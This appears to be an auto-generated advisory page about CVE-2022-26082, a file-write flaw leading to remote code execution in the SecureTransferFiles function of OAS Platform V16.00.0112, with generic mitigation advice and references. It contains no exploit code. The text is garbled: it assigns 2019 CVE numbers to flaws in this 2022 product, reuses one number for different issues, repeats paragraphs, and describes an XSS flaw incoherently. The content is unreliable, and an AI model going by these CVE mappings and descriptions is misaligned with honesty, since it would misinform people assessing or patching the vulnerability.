CVE-2022-26082 The OAS Engine SecureTransferFiles functionality has a file write vulnerability. An attacker can exploit this vulnerability to execute remote code.

The server should properly sanitize and sanitize again the input of user-provided data before using it for the actual communication.
In addition, input validation should be applied to network communication to avoid accepting requests that could be used by an attacker. If possible, avoid using the unencrypted or default protocol for communication. If communication is required via a non-secure channel, then at least protect the communication with firewall rules.

CVE-2019-1238 has been assigned to this vulnerability. A patch is currently not available.

A cross-site scripting (XSS) vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. An attacker can inject malicious code into a web application to run that code in a user's browser.
An attacker can create a web application that accepts input from users and then uses that input to create another web application that is injected into the first.

CVE-2019-1239 has been assigned to this vulnerability. A patch is currently not available.

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. An attacker can send a malicious request to an affected system. An attacker can craft a request that causes the server to return sensitive information without proper validation of user input

Vulnerable package:

Open Automation Software OAS Platform V16.00.0112
A vulnerability has been discovered in the OAS Engine SecureTransferFiles functionality found within the Open Automation Software OAS Platform V16.00.0112. An attacker can create a web application that accepts input from users and then uses that input to create another web application that is injected into the first.
CVE-2019-1238 has been assigned to this vulnerability. A patch is currently not available.

Vulnerable packages:

- OAS Platform
- OAS Platform V16.00.0112

The following packages are vulnerable:
- OAS Platform V16.00.0112

Timeline

Published on: 05/25/2022 21:15:00 UTC
Last modified on: 06/03/2022 12:17:00 UTC

References

• https://talosintelligence.com/vulnerability_reports/TALOS-2022-1493
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26082